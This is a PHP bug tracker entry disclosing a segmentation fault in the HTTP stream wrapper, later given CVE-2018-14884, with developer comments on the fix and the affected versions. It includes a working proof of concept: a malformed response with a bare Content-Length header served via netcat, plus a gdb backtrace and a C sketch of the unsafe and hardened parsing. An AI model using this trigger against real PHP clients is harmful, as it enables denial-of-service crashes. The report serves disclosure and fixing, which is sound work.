Sec Bug #75535 Inappropriately parsing HTTP response leads to PHP segment fault!
Submitted: 2017-11-17 04:35 UTC Modified: 2018-08-03 23:26 UTC
From: orange at chroot dot org Assigned: nikic (profile)
Status: Closed Package: HTTP related
PHP Version: 7.2Git-2017-11-17 (Git) OS: Ubuntu 17.04
Private report: No CVE-ID: 2018-14884
 [2017-11-17 04:35 UTC] orange at chroot dot org
Description:
------------
I fuzzed the HTTP parsing function in the latest version of PHP and found a segmentation fault. It is very easy to trigger this segmentation fault and may be vulnerable in some scenarios.

In `ext/standard/http_fopen_wrapper.c#L801`

`http_header_value` can be a NULL value, so `atoi(NULL)` will lead to a segmentation fault!

https://github.com/php/php-src/blob/9fbb019848cbb0387cb7267489dd91ebb4d9050e/ext/standard/http_fopen_wrapper.c#L801

Test script:
---------------
# cat poc
HTTP/1.1 200 OK
Content-Length

# nc -vvlp 80 < poc &
# php -r 'file_get_contents("http://localhost/");'
Segmentation fault



gdb-peda$ bt
#0  __GI_____strtol_l_internal (nptr=0x0, endptr=0x0, base=0xa, group=<optimized out>, loc=0x7ffff72f0400 <_nl_global_locale>)
    at ../stdlib/strtol_l.c:293
#1  0x00005555558f284b in atoi (__nptr=0x0) at /usr/include/stdlib.h:241
#2  php_stream_url_wrap_http_ex (wrapper=0x55555633f6e0 <php_stream_http_wrapper>, path=<optimized out>, mode=<optimized out>,
    options=<optimized out>, opened_path=<optimized out>, context=<optimized out>, redirect_max=<optimized out>,
    flags=<optimized out>, response_header=<optimized out>) at /home/orange/php-src-master/ext/standard/http_fopen_wrapper.c:801
#3  0x00005555558f3a7d in php_stream_url_wrap_http (wrapper=<optimized out>, path=<optimized out>, mode=<optimized out>,
    options=<optimized out>, opened_path=<optimized out>, context=<optimized out>)
    at /home/orange/php-src-master/ext/standard/http_fopen_wrapper.c:978
#4  0x000055555592baf9 in _php_stream_open_wrapper_ex (path=0x7ffff42632b8 "http://localhost", mode=0x55555602b563 "rb",
    options=<optimized out>, opened_path=0x0, context=0x7ffff42014c0) at /home/orange/php-src-master/main/streams/streams.c:2025
#5  0x00005555558a6129 in zif_file_get_contents (execute_data=<optimized out>, return_value=0x7fffffffc820)
    at /home/orange/php-src-master/ext/standard/file.c:550
#6  0x000055555581965c in phar_file_get_contents (execute_data=0x7ffff421b090, return_value=0x7fffffffc820)
    at /home/orange/php-src-master/ext/phar/func_interceptors.c:224
#7  0x0000555555a2209c in ZEND_DO_ICALL_SPEC_RETVAL_UNUSED_HANDLER () at /home/orange/php-src-master/Zend/zend_vm_execute.h:573
#8  execute_ex (ex=0x0) at /home/orange/php-src-master/Zend/zend_vm_execute.h:60062
#9  0x0000555555a27345 in zend_execute (op_array=0x7ffff427b2a0, return_value=<optimized out>)
    at /home/orange/php-src-master/Zend/zend_vm_execute.h:64091
#10 0x0000555555968426 in zend_eval_stringl (str=0x555556389d50 "file_get_contents(\"http://localhost\");",
    str_len=<optimized out>, retval_ptr=0x0, string_name=<optimized out>)
    at /home/orange/php-src-master/Zend/zend_execute_API.c:1054
#11 0x00005555559684f9 in zend_eval_stringl_ex (str=<optimized out>, str_len=<optimized out>, retval_ptr=<optimized out>,
    string_name=<optimized out>, handle_exceptions=0x1) at /home/orange/php-src-master/Zend/zend_execute_API.c:1095
#12 0x0000555555a2945a in do_cli (argc=0x3, argv=0x555556389cc0) at /home/orange/php-src-master/sapi/cli/php_cli.c:1042
#13 0x00005555556556c2 in main ()
#14 0x00007ffff6f4e3f1 in __libc_start_main (main=0x555555655250 <main>, argc=0x3, argv=0x7fffffffdfe8, init=<optimized out>,
    fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffdfd8) at ../csu/libc-start.c:291
#15 0x00005555556557da in _start ()



Actual result:
--------------
Segmentation fault
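An added illustration of the defect class the report describes (not php-src code, and not the upstream fix): a small "Name: value" header-line parser whose value pointer is NULL for a bare "Content-Length" line, next to a Content-Length reader that rejects that case instead of handing the pointer to atoi(). The function names are assumptions.

```c
#include <stddef.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical helper: return a pointer to the value part of a
 * "Name: value" header line, skipping leading blanks. Returns NULL
 * when the line has no ':' at all, which is exactly what the PoC's
 * bare "Content-Length" line produces. */
const char *header_value(const char *line)
{
    const char *p = strchr(line, ':');
    if (p == NULL) {
        return NULL;                 /* no value present on this line */
    }
    p++;
    while (*p == ' ' || *p == '\t') {
        p++;
    }
    return p;
}

/* The unsafe pattern from the report, kept as a comment only:
 *   long len = atoi(header_value(line));   // NULL deref when no ':'
 */

/* Hardened reader: a missing, empty, negative or non-numeric value
 * yields -1 ("no usable length") instead of a NULL dereference.
 * strtol() is used rather than atoi() so trailing garbage is caught. */
long content_length_safe(const char *line)
{
    const char *v = header_value(line);
    char *end;
    long n;

    if (v == NULL || *v == '\0') {
        return -1;                   /* header present but no value */
    }
    n = strtol(v, &end, 10);
    if (end == v || n < 0) {
        return -1;                   /* not a number, or negative */
    }
    while (*end == ' ' || *end == '\t' || *end == '\r' || *end == '\n') {
        end++;                       /* tolerate line terminator only */
    }
    return (*end == '\0') ? n : -1;  /* reject "42abc" and similar */
}
```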

History

 [2017-11-18 11:34 UTC] nikic@php.net
-Status: Open +Status: Closed -Type: Bug +Type: Security -Assigned To: +Assigned To: nikic
 [2017-11-18 11:34 UTC] nikic@php.net
Fixed by https://github.com/php/php-src/commit/0e097f2c96ce31b16fa371981045f224e5a37160.

The issue also exists in PHP 7.0 and 7.1, so I'm adding a security classification. Given control of the remote endpoint accessed by PHP, this provides a denial-of-service vector. As this is a null pointer dereference, it does not appear to be exploitable beyond DOS.
 [2017-11-20 08:14 UTC] stas@php.net
If it's security-related, shouldn't it be in 5.6 as well?
 [2017-11-20 10:08 UTC] nikic@php.net
@stas: The issue was introduced in https://github.com/php/php-src/commit/5146d9f8ac170d8ba7109370d732d56dc0777578, which landed in PHP 7.0.16, PHP 7.1.2 and PHP 7.2-dev. It does not affect PHP 5.6.
 [2018-05-03 00:48 UTC] stas@php.net
-CVE-ID: +CVE-ID: needed
 [2018-08-03 23:26 UTC] kaplan@php.net
-CVE-ID: needed +CVE-ID: 2018-14884
 
PHP Copyright © 2001-2018 The PHP Group
All rights reserved.
Last updated: Sun Sep 23 06:01:25 2018 UTC